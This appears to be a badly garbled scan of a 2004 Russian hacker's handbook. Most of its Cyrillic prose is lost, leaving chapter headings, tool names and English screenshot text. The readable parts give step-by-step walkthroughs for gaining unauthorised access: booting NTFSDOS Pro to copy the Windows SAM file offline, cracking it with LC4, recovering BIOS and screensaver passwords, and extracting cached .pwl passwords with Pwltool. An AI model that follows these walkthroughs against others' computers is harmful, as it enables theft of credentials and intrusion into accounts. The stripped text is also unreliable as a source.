Вы находитесь на странице: 1из 398

SNMP Brute

Force Attack

WAN Killer

Security Check

Brutus-AET2

PeepNet

Zombie Zapper

Death n
Destruction 4.0

Invisible
KeyLogger
Stealth

Network Sonat

IP Network
Browser

Alex WebKnacKer

11 U AHTUXAKUHr
100 -.!

004.056.5
Alex WebKnacKer
. : .
. .: , 2004 400 .: .
ISBN 5-93673-025-5
:

! .
100 . -,
.

-
-:

www.3st.ru

ISBN 5-93673-025-5

, 2004
, 2004
..
, 2004


( )

1.

1.

2.

25

3.

36

4. Windows 2000/XP

46

2.

58

5.

58

6.

78

7.

95

3. -

113

8. Web

113

9.

....129

10.

148

11. ICQ

164

4. Web

180

12. Web-

181

13. DoS

209

5. TCP/IP

226

14. Windows 2000/XP

227

15.

242

16.

258

17.

277

18.

286

300
381

1.

XpoHuku
1.

1<
, - ,
, , , . , , . ,
( ).
!!!
, , .. ,
, 2 () .

.
,
:
log:
:
1:
2:
em: e-mail
.
, !
. 13.06.1999, "..
.
!!!
,
http://www.super-internet-provider.ru

1.
, .
, - , , , , , , , . , , ,

Web- .
-
, . - , . ,
, , , ,
.
- ,
, .
- , , , . ,
, !
, , ,
.
, , .
- , 80- , , , , - ,
.
.

Xakepbi u
, ,
, ,
.
,
, , .

.
( !),
.
- (-, !)
, ,
.
, ,
-
,
.
, , ,
, ,
, . , ,
,
, ,
, -
.
,

.
, . , , , , , ,

, .
, , ,
. , - ,
, ,
, .
20-
- .

1.

makoe ?
, , , , ,
, - , -
, ,
(, -
)
, . , - , .
, , .
( ).
, :
(, . ).
, ,
, .
Hard DISK [ Fdisk.exe] n- ( , ) .
! , ,
!
[ 24% ]
, POWER - !
IDE- .
, . , , , - , , , - , HARD DISK
- , - , - , .
, Must die,
.
Windows,
, .

,
, .
, Windows ? ,
, - ? , , , ,
.
, ?
21 ( ).
:
:

, , ,
, ,
. , .
:

, .
. ,
, ,
.
:
. .
, . .
, ,
.
.
: ,
.
, ? -
, , ?
,
?

1.
, - .
, , , , , ...
. , ,
, (, ,
) . , :
- , 16 19 .
( 80%) , nerd.
: 1) , ; 2)
. (, ?
- ).
Windows Unix,
TCP/IP
, , C++, Perl, Basic.
, .
- , - 19- . , ,
, , . , , ,
. ,
, -, , .
, , , .
-
, , , .
, . , ,
- , - .
.
, , , - . ,
. , , .

10

Takmuka
,
? - , - .
, ,
. , , ,
, , ,
. . ,
, .. . , ,
, ,
, . - .
, , - , '
, , . ,
, ,
, ?

, , - , , ,
.
- , , .
,
, , , ,
. , , , , ?
, , , .

xakepbi ?
, , , ,
, , , .
, , , ,
. , ,
, - , , , , . , .

1,

11


, ,
, , ,
. -, - - , , , . , ,
, , [2], , ,
, , ( ).
[2] 1991
125 500 , - , ,
.
- ...
-
-. 8, - . , -, Web-
, , .
. - .

.
.
, [2]
WebMoney (http://www.webmoney.ru)
, -,
WebMoney. ,
, WebMoney
?

12

SecurityLab.ru 23 2002

, Evans Data.
750 ,
12% ,
27%, ..
! , ,
,
.
, ,
,
, ,
, .
, - .

, , . , , , .. , , .
, , , .
, - , - ILOVYOU, ,
,
. , , ,
- . , , ( Yankee Doodle).
, , .
. -
, , , . , 19 ,
N3 2000 .? N5:

1.
, , ,
:). ,
, , ,
, . ,
, :). , ,
. , ,
. , , , :).
, ? - , ,
. , - .
, , ICQ-. ,
? 1 1 , ,
ICQ, . , . ,
,
[3].
DoS (Denial of Services - ), 13?
- Web-,
, Yahoo
(http://www.yahoo.com), , .
, , - ,
(, , )?
, ,
. , -
, , - , , Web- ?
!


-
. -

14

, , , , . , ,
, ( blackmail - ).
. --... , 19-
(. ) 19.
. [2] Bloomberg LP ,
, 200 000
. - , . -
, ( , ). [2], , ,
, , , ,
.
SecurityLab.ru
(http://www.securitylab.ru). 21 2002 .
28- . , , , ,
, 4 000 .
: ,
...
. SecurityLab.ru
! - .



. , , , - (Stealth)
Lockheed Martin (. [2]), , ,
, . , Lockheed
.

1!5

, SecurityLab.ru, -
.
13 2002
43 ! Rafa,
World of Hell ( ).
,
.
, ? SecurityLab.ru. ,
$59' 7
2002 .
Fortune 1000, , . ,
404 . , - 356 . .
(49%) ,
(36%) ,
(27%) - .
- 59 . !


SecurityLab.ru
,
. , , Symantec, , 64%,
2002 . 32 .
. ( SecurityLab.ru) , ,
.
, - ,
, , , .
, , .
-
, ,
. , 2004 .
.
? - , .

16

xakepbi ?
, , ? -
, , .
( , ) ,. - ,
, , .
, , .
-
, , Windows,
MS Word,
. , , , .
[2] .

- , MS Office Oracle. , , , 11 2002 SecurityLab.ru Oracle 9i ,


Oracle .
- ,
Oracle .
MS Word 6 .

,
. Windows 2000/XP - , . 4,
14 , Windows 2000/XP.
- . SecurityLab.ru 21 2002 Microsoft,
FTP- Microsoft, ZIP-. Wired News,
-

Microsoft. ,
! , , ,
Microsoft - Microsoft! , .
, ,
- (.. ), (..
),
(.. ). , , - , ..
, ,
, . ,
, ,
- , ?

- ,
. - . ,
. , , - , .
, -
; ,
- .
, . , , .
CVE (Common Vulnerabilities and Exposures - )
MITRE. MITRE (http://www.mitre.org) ,
,
,
Web-. CVE.

18

.
CVE-2002-0055
SMTP service in Microsoft Windows 2000, Windows XP Professional,
and Exchange 2000 to cause a denial of service via a command with a
malformed data transfer (BOAT) request. ( SMTP Microsoft
Windows 2000, Windows XP Professional Exchange 2000

)
Reference: BUGTRAQ:20020306 Vulnerability Details for MS02-012
Reference: MS:MS02-012
Reference: XF:ms-smtp-data-transfer-dos(8307)
Reference: BID:4204

, . , Internet Security Systems (ISS) (http://www.iss.net) - .. ,


. Web-
(, ), - FreeBSD,
Solaris, Windows 2000/XP .
SecurityLab.ru,
,
( , ,
).
, , , , - , - , ! , ! , ! - , - , , .
, ,
, .

Kak xakepbi
, ,
.. , .
, , . , ,

1.
, , .
, ,
,
,
. , , : - .


,
. ,
, , , , ,
[3].
, , , . ,
. , 3
, .

, , , , .
- - , .
- , , , . ,
, ,
.

,
.

20

.
. , ,
. , , . , - , , [2].
, ,
. , , (, ), ,
,
. - ,
.
, .
.
, -
-, , , Web-.
, , ,
.
, ( , )
, ,
DDoS (Distributed Denial of Services -
). DoS 13 .
- . , , Web-.
,
( - ,
Web). ,

-- ,
,

1.

.
,
9 10 .
-
Web-, - Web- .
, - Web- -
12. , - ,
19 -
. 3 4
.
, . , 14
TCP/IP
Windows 2000/XP.
.
,
. ,
, , .
? - , , , . - , . , - , sniffing - . ,
17 ,
TCP/IP 5 .

, , , ( ,
) . , - ,
, !
-

22

.
- ,
, . , , , , , ,
, . .
- , [3].
, , , .
, [3]. ,
.
18 PhoneSweep.
- , PhoneSweep
Windows 2000/XP,
.
Login
Hacker, TCH-Scan ToneLock. PhoneSweep -
.
, -
.
,
SecurityLab.ru - , , , . ....
- , , (), . ,
, 50%
, (!!!), , !!! ... - .

1.

23

Cokpbimue
, ,
, ,
. , . , - , . , , ,
.
,
, (.. ,
). ,
, ,
, , , .
, ,
, , ( rootkit -
). - UNIX,
Windows 2000 , 7,
, , , , Windows, , .
.
IP-,
.
-
.
, - , , -, - ,
.
, 7 -

,
, .

24

. ,
,
.
-
, ,
, .
-
,
. - .

2.


. , , , - .
- , ?
- , ,
.
, .. .
(., , [2]),
, , , ,
.
, , .
, ,
,
, ,
.
, ..
-
, ,
.
- . .
:
, , , -
(, ). , , IP-,
, .. ,

. , , .

26

, IP-
, Whols (,
http://www.ripe.net) IP-
, .
IP- ,
, , DoS, .
, DoS,
- , .
, , ,
.
.
.

.


-, , . - , ,
,
... , , , . , ,
. , ,
. , ,
.


, ,
( ) [2].


,
, , .
- , , , , , , , ,

2.

27

. ,
, , ,
. , ,
, .
, , , . . , . , ,
, ..
- , ( )
.


,
. , , 1 - ,
.
, , .
7.

Honbimka
1,
, ,
. , , , Retina (http://www.retina.com). , , .


. , , , , -

28

,
( ).

, , - , .

!<6
, DoS.

, .

, , Telnet.
, - , , -...

UcmoMHuku
,
? ,
.
. ,
Windows 2000/XP, ,
, , , , STARR.
. ,
, ,
TCPDump.
. IDS (Intrusion Detection System ). (, Blacklce Defender),
, . ,
IDS
.

2.

29

CpegcmBa
, , ,
. , ,
. , , .
,
, ,
. :
.
Windows 2000/XP , , FileWatch 1.00
foundstone_tools (http://www.foundstone.com).
. ,
- ,
. , , TCMonitor
The Cleaner (http://www.moosoft.com).
. , Windows 2000/XP , , , . ,
, , RealSecure (http://www.iss.net).
. , , DoS
.
,
IDS, , BlacklCE Defender (http://www.iss.net).
. . , , , .
, , , , TCActive
The Cleaner (http://www.moosoft.com).

30

.
,
, ,
Attacker 3.0 foundstone_tools (http://www.foundstone.com).
. ,
, , . Windows, , , SOLARWINDS (http://www.solarwinds.com).
,
, . , .
. , ,
,
. ?


,
, . . , , ,
.
,
, -
. - ,
, IDS, , BlacklCE Defender - , , ,
. , ( ).
.
, . , . , .

2.

31_

, , , 24 ,
, , , DoS. ,
, .
,
.
, , - ? ,
. ... , ,
- .


, . , ,
( ),
( ). .


- .
.
, .
,
,
[2].
, 1, ,
- , , .
, . , , , ,
.
,
:

32

.
[3,4] - ,
, .. ,
. , ,
, , , Windows 2000/XP.
,
. ( , ) ,
.
,
, , , .
. Windows 2000/XP
,
. Windows 2000/XP , - , , -
, Windows 2000/XP [6].
Windows 2000/XP 4.
. . , ,
. ,
, PGP Desktop Security (http://www.pgp.com),
NTFS. ,
- WinRAR, , .
VPN (Virtual Private Network - ), .
IDS. . Windows XP
, . , , WinRouter, ,
IDS, , BlacklCE Defender, . ,
, , Attacker 3.0
foundstone_tools (http://www.foundstone.com).
. , -
, ,
- . -

2.

33

,
.
Retina.
. . - .
Windows 2000/XP
, ,
.
. ,
, , Norton
Antivirus, MacAfee VirusScan, The Cleaner, .


, ,
, . Microsoft Windows 2000,
- Windows 2000.
- , , .
, (, ), Windows 2000/XP -
( , , , ).
Windows Norton Antivirus
Symantec, IDS BlacklCE Defender -
,
, , . - ,
, (
) , , .
, , .
- - , , ,
. , , .
. ,
IDS 2-1687

34

.
IP- . , , .
- ,
Web-
IP- ( ) (- ).
,
.

.
, , , , IP-
, , WhoIS,
. (, RIPE NCC
http://www.ripe.net) IP- , . , , .
ISP
-, .
. , , , (., , [5]),
, (, ). , - .
. - , - ,
,
, ,
, ,
, , DoS. , . , ,
DDoSPing UDP Flood foudstonejools, -, DoS, , . - , , 10. ,
.

2.

35

- ,

- ,
. ,
;
, , -
. , ,
- ,
, ,'
. , , , - .

3.


- ,
- . -
, ,
. ,
DoS ,
IDS.
, . , ,
. ,
, ,
, , , ,
.

.
,
.


, - , , .
, ,
.
1 ,
.
; , .
- ,
, , , , .
, , , . , [3] , -

3.

37

. ,
, [3] !
[1]. , (
). ,
, , - . , , ,
, ,
. ,
. , - , ,
.
, . , ,
,
. - .


. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols,
, ,
.
, , , Web-. Yahoo
(http://www.yahoo.com), Rambler (http://www.rambler.ru).
. , , , , . , , , [3].
Google
(http://www.google.com),
. , ,
C:\WINNT, Windows NT/2000.

38

,
.
, , Teleport Pro,
12. ,
Web- ,
. , ,
HTML Web- - ,
, HTTP
. , , , , , , , , (
18 ).
, Web- - ,
, . , .

k
1 , , , . . .
-, , , , ..
, , . - SAM
(Security Account Manager - ), .
SAM - ,
5 ,
, , ,
, , LOphtCrack LC4 (http://www.atstake.com).
-, , , , Windows , MS Office . , .
,

3.
. Office Password 3.5
(http://lastbit.com/download.asp) Windows - , , .
6 Revelation
SnadBoy (http://www.snadboy.com). , ***** - , , -
Revelation .
,
, , , ,
, .
, D , , ,
, , .
-
?
, ,
- , - .

Amaka Web
- . , Web-,
,

-.
, Web, Web-,
Web- ,
. Web- 8 ,
HTML, ,
HTML 4.

,
. , Web-,

. , , ,

40

Rambler (http://www.rambler.ru) ...


, ,
, ,
, . 9
,
.
. , , 10 Death & Destruction Email Bomber - .
, . - , , ,
10 Brutus.
, , ICQ.
- IP- ICQ-
( flood - )
ICQ- , ! - , 11 ICQ Flooder, ICQ-MultiVar,
.
- , IP- ICQ- ICQ,
, .
, .

Amaka cepOepoB \l\leb


Web- , , , DoS, - . , IIS 5 (Internet Information
Server - ) Microsoft
.
Web- , Web-, -

3.

41

HTML . 12
, , CGIScan
Brutus, IIS
. 13 ,
DoS.
Web- ,
,
Web-. , DoS
, - , . Web-
, , CGI-. , , .


TCP/IP , ,
, , IP-,
, .
,
.
14 - SuperScan, foundstone_tools
(http://www.foundstone.com).
W2RK (Windows 2000 Resource Kit -
Windows 2000), ,
W2HK (Windows 2000 Hacker Tools - Windows 2000).
TCP/IP Windows
, SNMP (Simple Network Management Protocol - ). 14 , SOLARWINDS
(http://www.solarwinds.com) - IP Network
Browser, SNMP -
SNMP Brute Force Attack SNMP Dictionary Attack. W2RK
SOLARWINDS , W2RK
SNMP .
,
, , .

42



, , . , ,
-
, .
, . ,
, .
- . , ,
, ,
. 17
- SpyNet,

.
, , , . , ARP (Address Resolution Protocol -
),
. ARP, ,
. -
, . , Windows
Unix, 17 , ,
, .
, , VPN (Virtual Private
Network - ) , , -
. , , , ,
, .

3.

43


, W2RK (
Windows 2000) W2HK - Windows 2000,
. Windows (Explorer) Windows, . ,
, , password, .
[3], ,
,
, .

, , ,
password.txt , ISP.
, , . , NTFS Windows 2000/XP,
, ,
PGP Desktop Security.

-
- ,
, .. . 1
Web- , (., ,
http://www.securitylab.ru). 12 IIS. CGIScan
, . , - , , IIS 4. Web
, .
- , , . .
, ; , , - ( ). , , - -,
, - .

44


- ,
. - ,
. 14
NetBUS,
. - , .
- , , ,
.
. - , ,
. , , -
- , ,
... , , .


-
, ,
.

, . , .
- ,
,
.
TEMPEST, . -
, , ,
, .
.

3.

45

-
, , , , . , , ( ), , ? , , ,
,
?
, - ?
, , ( ),
, , , -
.
, .

. ,
, ,
1, . , ,
.
, ,
,
, .... , , - Windows 2000/XP.

4.

Windows 2000/XP
Windows 2000 TCSEC (Trusted Computer System Evaluation
Criteria - ) .
,
Windows 2000, , .

. .

.
, - ,
, ,
, , .. ,
- .

, ( log in - ), - , . ,
, ,
, .
Windows NT/2000/XP SAM (Security
Account Manager - ). SAM , , . SAM -
, 5
.
, . .
,
, , . ,

4. Windows 2000/XP

47^

, , .
, , , .., , , , . , , -, (,
, ) , , , .
,
, , , . Windows NT 4
NTLM (NT LAN Manager - NT). NTLM
Windows 2000/XP. NTLM,
, LM (LAN Manager - ),
, Windows

NTLM.
Windows 2000/XP Kerberos, , ,
. - Windows 2000/XP, -
Windows 2000 Kerberos.
- ,
Windows 2000/XP - . , ,
, ,
- .

, , , .
- . Windows , , , . ,
, .
, , ,
, ,
.

48

, Windows NT/2000/XP
.
, . ,
, . , ,
. ,
(Guest),
, - (User),
.
, , ,
. , (Administrators), ,
-
, , ...

,
, .
, , - , 2, .. , .
, , . , , , ,
, .
Windows NT/2000/XP,
, , - .
, 7, ,
, .
,
, , , , , ,
.

4. Windows 2000/XP

49^

,
11 , , .
, , [2], [6],
, -
Windows 2000/XP, ,
.

Kak Windows 2000/XP


Windows 2000/XP SRM
(Security Reference Monitor - ). SRM Windows 2000/XP, .. .
Windows 2000/XP , , SRM. .
LSA (Local Security Authority - ), ,
, LSA.
, LSA . , LSA , .
SAM (Security Account Manager - ), . , LSA.
AD (Active Directory - ),
AD .
,
LSA.
,
, :
, ,
Kerberos; , .
, , , : , , , /,
. SAM AD ,
LSA . ,
, , .. , SRM.

50

, ,
Windows 2000/XP. ,
. -,
(SAM AD); -, . ,
.

SAM
, , , ,
. , , , SAM AD,
. SAM %_%\58132\\5,
AD - %KOpHeBoii_KaTanor%\ntds\ntds.dit. , ,
, - ! ..
,
, , ,
, Windows 2000/XP. SAM
Windows NT 4 , NTLM , ,
,
LM,
Windows. LM , SAM , , LOphtCrack
(http://www.atstacke.com) ,
.
LOphtCrack
SAM,
, ,
pwdump (http://www.atstacke.com). Windows - pwdump SAM ,
LOphtCrack, - ,
LM - .
Service Pack 3 Windows NT 4, , Syskey
() , SAM.
Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey
,

4. Windows 2000/XP
. ,
- ,
3-4 , . ,
1 Microsoft, - Microsoft!
Windows. ,
, .


Wincjows 2000/XP
, , , , ,
? .
, , Windows,
SID (Security
IDentifier), 48- ,
.
Windows 2000/XP SID,
Windows 2000 8.
. ,
, ? (, ..)
Windows ACL (Access Control List -
), (Access Control Entries -
). SID
. ACL
, , (Explorer) Windows, Windows 2000/XP.
ACL.
Windows 2000/XP (, ) LSA , SID SID , .
, ,
SRM 8 ACL , , .

52

, , - . ,
, - , . , .
- ACL , Windows 2000/XP . , (, NTKap http://www.rootkit.com). ,
ACL !
, - , ? , . ,
, Windows 2000/XP.

kanmoz
Windows NT 4 , ..
, Windows 2000/XP
ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server. , ,
.
- , , ,
, - ADS , , .. . , ,
IP- .
ADS , , - ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU - , .. OU , OU .

4. Windows 2000/XP

53^

Windows 2000/XP
, . , . Windows 2000 , - , Windows 2000 Windows NT. ,
,
.
Windows 2000/XP
, . ,
,
. , .. .
, . , domen.
: com1.domen, comp2.domen...
, ,
, , domenl, domen2,... , ,
.
, domenl domen2 , domen2
domenl, domen2
comp1.domen2.domen1, comp2.domen2.domenl, ... compN.domen2.domenl. A
domenl domen2 , forest,
. ,
domenl compl.domenl.foresi, comp2.domenl.forest
,
domen2

compl. domen2.forest,
comp2.domen2.forest
.
, - ,
:

.
(Universal group), jvioryr , , .

54

(Global Group),
, ,
.
(Local group domain),
, .
ACL
. -
.
, , AD,
, , .
- AD SAM,
, SAM.
AD , AD, ,
( 10 ), AD , , , . , . ,
, ,
Window 2000, . , , LC4
LOpghtCrack .
, , - - .

Windows 2000
Windows 2000
, . - ,
, -, ,
. -,
D , ,
- . , ,
- ,
.
.

4. Windows 2000/XP

55^

- ,
- , AD. - - ,
- -.
- ,
.

. -,
- . -,
, - ,
, , , .
, , , . . - , , ,
LM, - LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4).
, , Windows 2000 Kerberos,
- ,
.
.
, Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.
- TCP- 88 , Kerberos, . -
LM
NTLM, LOphtCrack .
, - ,

. , ?

56

, , ,
.
, ,
.
,
. , , ,
.

,
. , , Windows 2000.
,
Microsoft , ,
. Windows XP

Windows.

Windows 2000/XP [7], . , ,
,
.
, , Retina, [7].
-, . -, , , VPN (Virtual Private
Network - ). VPN ,
. VPN
, .
, , , ,
(Bruce Schneier),
(Applied Cryptography), - .
,
- ,
, .

4. Windows 2000/XP

57^

, .
- , ..
.


Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, TCP/IP ADS ,
Microsoft Press Windows 2000.

2.


. ,
.
- , ,
.

5.


Window 2000/XP, ,
, , , ? , 2,
,
,
, . . ( ,
- . .)
- ,
. , , ,
( - ...).
, , . , , , ,
, ,
( - ).
? , -

5.
, . - .
, . ,
-
, - . , .
-, , - - , Windows. , ,
,
- ,
.
, , ,
(. 1), -
, . -
, , , - -.
-, , , Windows BIOS . , Windows 2000/XP .


,
- (, ). , , - MS-DOS !
- ,
. -, BIOS , BIOS
. .
-, BIOS ,
NTFS, Windows 2000/XP. , MS-DOS - -
, - .
, -, , ( - - ,
! , . , , ),

60


Windows 2000/XP. -
NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS
MS-DOS. ,
, Windows 2000/XP
.
- , . NTFSDOS
Professional - .

NTFSDOS Pro
NTFSDOS Pro . Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. .
, FORMAT/S SYS
MS-DOS.
Windows XP Create an
MS-DOS startup disk ( MS-DOS).
> * NTFSDOS Professional
(Start * Programs * NTFSDOS Professional). (. 5.1).

his wizard will help you install Windows NT/2000/XP system files needed
by NTFSDOS Professional to run from a MS-DOS diskette or hard disk.

. 5.1. NTFSDOS Pro

5.

61

> Next ().


(. 5.2),
,
.

NTFSDOS Professional Boot Disk Wizard copies drrvers and system files from an existing Windows
NT/2000<P installation or CD-ROW to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or
after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make
bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the
'Formaf option from the context menu of your diskette drive, and formatting a diskette with the 'Create
an MS-DOS startup disk" option checked.

Puc. 5.2.

> , Next (),
.
NTFSDOS Pro MS DOS
( 437).
(. 5.3) .

ding language information enables NTFSDOS Professional to correctly transla


le names between Unicode and your local character set.
NTFSDOS Pro uses the character set for the United States version of MS-DOS (code page 437) by default.
Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab). code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 861
MS-DOS Multilingual (Latin IX code page 850
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 860
MS-DOS Slavic (Latin II), code page 852

Cancel

. 5..

62

> Next ().


NTFSDOS Pro
(. 5.4).

.pecify the name of your Windows NT/2000/XP installation directory, or a directory containing the required
Windows NT/2000/XP system files.
|C\ASFRoot

<Bock

Cancel

Puc. 5.4. Windows


Windows
NT/2000/XP, NTFSDOS Pro. , , C:\W1NNT, \I386
Windows NT/2000/XP, - Service Pack.
> Next ().
NTFSDOS Pro (. 5.5).

Spedfy the disk or directory from which you would like to run NTFSDOS professional. You may
select A: to specify a floppy disk.

Cancel

Puc. 5.5. NTFSDOS Pro


NTFSDOS Pro. MS-DOS,

5.

63

.. FAT FAT32. :
. Advanced () NTFSDOS Pro , MS-DOS.
> Next ().
NTFSDOS Pro (. 5.6).

nsert . (loppy labelled NTFSDOS Professional Disk 1

Press Next to copy files to A:\.

. 5.6. NTFSDOS Pro


> Next (),
(. 5.7).

nsert efloppy labelled NTFSDOS Professional Disk 1

Copying files to diskette...

Cancel

Puc. 5.7,

(. 5.7) Next
() . Windows XP NTFSPRO.EXE

64

, NTFS .
Windows NT/2000 . NTFSCHK.EXE,
NTFS.
(. 5.8)
NTFSDOS Professional.

necessary files hove been copied. You mey now reboot to MS-DOS
d begin using NTFSDOS Professional Edition.

Puc. 5.8. NTFSDOS Pro

> Finish (),


.
NTFSDOS Pro, .
NTFSDOS Pro . , ,
NTFSPRO.EXE, NTFS .
, ,
MS-DOS ,
FAT FAT32, NTFSDOS Pro
.
MS-DOS NTFS,
Windows 2000/XP . ,
( - ), , , . , -
, , , . ,
,
, .

5.

65

- SAM,
, , _/5132/.
SAM, , SAM, . , BIOS ,
. , ,
Setup BIOS (
- ...). ,
BIOS.

BIOS
BIOS ( ),
.
I0"*"!, Setup, BIOS,
.
CMOS. BIOS
Setup BIOS
.
- BIOS ,

. , CMOS , . , CMOS ,
BIOS , , BIOS. (, !). - ,
,
. .
, , (), , ,
CMOS. , , ..
BIOS. , ;
, ?

3-1687

66

BIOS - ,
Setup - , , [8], [10].
. Web- - BIOS.
- ,
, ,
BIOS? , -,
, ; .
, . 5.9 amipswd.exe
,
BIOS AMI CMOS . , ! , ...
MS-DOS Prompt

C:\Test>anip<>ud
CMOS AMI DIGS password decipherer v. 2.02
(lulhor: U. ShatOMsky, Tula.
Optimized a added by C c ) PSU-soft, P. Senjanov, St. Petersburg
CMOS password: 007

IE
. 5.9. BIOS !

sacmaBku
, BIOS , . -, BIOS , * , , BIOS
- . ,
, . , ? , , , , .. - , .

5.

67^

, Windows -
. Windows 95/98/NT/2000/XP
, , , , ,
Windows. ScreenLock iJen Software. , -
,
.
, Windows 95/98,
, Windows 95/98 . |[Esc|. TQ
. , Windows 95/98 .
, , , , ..,
. - Windows 95/98,
Windows 95/98 , ,
95sscrk. Windows 95/98
, . 5.10.
5 MS -DOS Prompt

Microsoft(R) Windows ?S
(OCopyright Microsoft Corp 1-1996.

C:M'IINIIOWS>cd ..\test
C:\Test>9Ssscrk
Uin95 Screen Saver Password Cracker ul.1 - Coded by Nobody (nobodyOrngelska.se)
(c) Copyrite 1997 Burnt Toad/ Enterprises - read 95SSCRK.TXT before usage!
No filename in cormand line, using default! (C:\UINOOUS\USER.DftT)
Raw registry file detected, ripping out strings
Scanning strings for password key...
Found password data! Decrypting ... Password is 007!
Cracking complete! Enjoy the passwords!

Puc. 5.10. !
-

68

, Windows Windows. CD-ROM


-, , ,
, Autorun.ini, Windows 95/98 ( Windows 2000/XP).
( ScreenLock) - Windows.
, - , Autorun.ini, CD-ROM
. , , ( ),
- . - - , !
...
, SSBypass (http://www.amecisco.com), , , Windows 95/98
. SSBypass $40,
. ,
- , Windows.


, , , . ,
, , (. 1) - ,
,
( -!), ... , ,
Web-.
, , , , . - .
Windows 95/98
,
. Windows NT/2000/XP ,
.

5.

69

4, -
SAM , . , .

SAM
SAM, SAM.
NTFSDOS Pro,
MS-DOS SAM
/_/132/ .
- , , LC4 - LOphtCrack
(http://www.atstake.com).
. 5.11 LC4 Import
().
, LC4
, . SAM :
> File * New Session ( ). , . 5.11.

Domain

Import From Local Machine


Import From Remote Registry.
Import From SAM File...
Import From Sniffer...
Import From .LC File...
Import From .LCS (LC3) File
Import From PWDUMP File...

?* nans 1^ i MI
i <o t

Use the Import menu to retrieve accounts to audit.

E Jll

___2_
n nnns.

. 5.11. LC4
Import * Import From SAM File ( *
SAM). SAM.

70

SAM, 1-3.
(. 5.12) Session * Begin Audit
( * ) .
lEVstake LC4 - [Untitledl 1
File

View

Domain

Import

Session

Help

8 | NTLM Pa?

1 User Name
Administrator
ASPNET
Guest
HelpAsststant
IUSFLALEX-3

' empty '

empty '
empty '

IWAM_ALEX-3

' empty '


' empty '

NewUsei

empty '

empty

1 II - \

mpoited 7 accounts

. 5.12. SAM
, , SAM, . , . 5.13, SAM.
j@slake LC4 - [Untitledl |
Import

(EALEX-3
ALEX-3
ALEX-3
ALEX-3
ALEX-3
ALEX-3
ALEX-3

Session

Help

Administrator
ASPNET
Guest
HelpAssillant
IUSR_ALEX-3
IWAM_ALEX-3
NewUsei

empty empty '


' empty '
' empty '
' empty-

Dictionary! ofl [CAProgiam Fites'i@stake\LC41,ivoids-english.dic]

Puc. 5.13. SAM !

5.

71

, - 007 , , .
, , 5
Pentium 2 400 . - , LC4
.
LC4 Auditing
Options For This Session ( ), . 5.14.
Auditing Options Foi This Session
Dictionary Crack Enabled

Dictionary List

The Dictionary Crack tests for passwords that are the same as the words listed in the
word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack0

Enabled

Characters to prepend
^1 Characters to append
Common letter substitutions (much slower)

The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in
the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and
finds weak passwords.
Brute Force Crack0

Character Set:

Enabled

|A-ZandQ-9

Distributed
Part

1 Of L_

Custom Chatacttt SeUfel each ehauctwfc

The Brute Force Crack tests for passwords that are made up of the characters specified
in the Character Set. It finds passwords such as 'WeR3pH6s" or "vC5%S9+12b". This
test is slow and finds medium to strong passwords. Specify a character set with more
characters to crack stronger passwords.

Cancel

Puc. 5.14.
, LC4 :
Dictionary Crack ( ), Dictionary
List ( ), . LC4
, ,
. ,
, , , ,
.., .

72

Dictionary/Brute Hybrid Crack (/ ),


, / ,
, .
Password???, .
Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) .
Distributed ()
. File Save
Distributed ( )
.
LC4
Windows NT/2000/XP.
Windows,
Windows 95/98, Pwltool.

.pwl
Windows 9x/Me .pwl, Windows.
,
, , - Pwltool (http://soft4you.com) (Vitas
Ramanchauskas) (Eugene Korolev).
, Windows 9x/Me,
? , .pwl , , ,
NetWare,
Windows, , .
, Pwltool - .
Pwltool RePWL, * * PwlTool Demo * Repwl (Start Programs
PwlTool Demo * Repwl). RePWL
. 5.15.

5.

73

Repwl (version 6.5. Demo)


PWL File

E:\WINDOWS \A1_EX.FWL

Cached passwords

Browse

User name | |ALEX


Password

Fl | CheckPass]

Brute force | SmartForce f Dictionary |

SearchPasswordFast

SearchPassword

CheckPassFast

Client/Server

Q Zombie mode

Help | | Adv

. 5.15. Repwl
Pwltool.
Cached passwords ( )
Windows
, - . .pwl,
Browse (), (
Windows /Me
).
.pwl ,
PWL File ( PWL). , Net Name ( ). Browse () Local Net Share's resources (
), . 5.16.

| tj Local Net Share's resources


Provider

|Type

SMicrosoftWind.
Microsoft Wind.
S Microsoft Wind.
SMicrosoftWind.
gMicrosoftWind.
Microsoft Wind.
g Microsoft Wind.
Microsoft Wind.
SMicrosoftWind

feMicrosottWind.

Scan

Disk
Disk
Disk
Disk
Disk
Disk
Disk
Disk
Disk
Server

Filter

I RemoteNerne
\\SWORD-2000\My Documents
\\SWORD-2000\NETLOGON
\\SWORD-2000\D
\\SWORD-2000\scripts
\\SWORD-2000\Update
\\SWORD-2000\My Document...
\\SWORD-2000\Test
\\SWORD-2000\My Downloads
\\SWORD-2000\SYSVOL
\\SWORD-2000

[ Connect |

Get

I Speed (kb/sj 1
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63
9765.63

r^n

. 5.16. .pwl

74

, . Scan ()
. Filter ()
, Connect
() ,
Get () - .
User name ( ) Repwl (. 5.15)
.

, . Windows 95
Windows 3.1, Glide () .pwl . - .pwl Windows.
- , , , Password () ,
CheckPass ( ) - , . 5.17
.
User name: ALEX
Password found: 007
File: E:\WINDOWS\ALEX.PWL
User name: 'ALEX1
Password: '007'

Save As

Print

To clipboard

Cached passwords:

Puc. 5.17. 007 !


